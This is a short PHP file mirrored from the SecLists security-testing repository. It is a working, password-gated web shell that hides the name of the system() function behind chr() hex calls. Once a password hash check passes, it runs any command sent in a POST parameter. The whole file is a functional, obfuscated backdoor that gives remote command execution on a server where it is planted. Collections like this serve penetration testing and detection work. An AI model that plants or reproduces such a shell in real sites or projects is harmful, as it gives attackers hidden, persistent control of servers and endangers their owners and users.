mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-04-29 02:06:29 -04:00
22 lines
255 B
PHP
Executable file
22 lines
255 B
PHP
Executable file
<?php
|
|
|
|
$pass = "9cdfb439c7876e703e307864c9167a15"; //lol
|
|
|
|
$A = chr(0x73);
|
|
$B = chr(0x79);
|
|
$X = chr(0x74);
|
|
$D = chr(0x65);
|
|
$E = chr(0x6d);
|
|
|
|
$hook = $A.$B.$A.$X.$D.$E;
|
|
|
|
if($pass == md5($_POST['password']))
|
|
{
|
|
$hook($_POST['cmd']);
|
|
}
|
|
else
|
|
{
|
|
die();
|
|
}
|
|
|
|
?>
|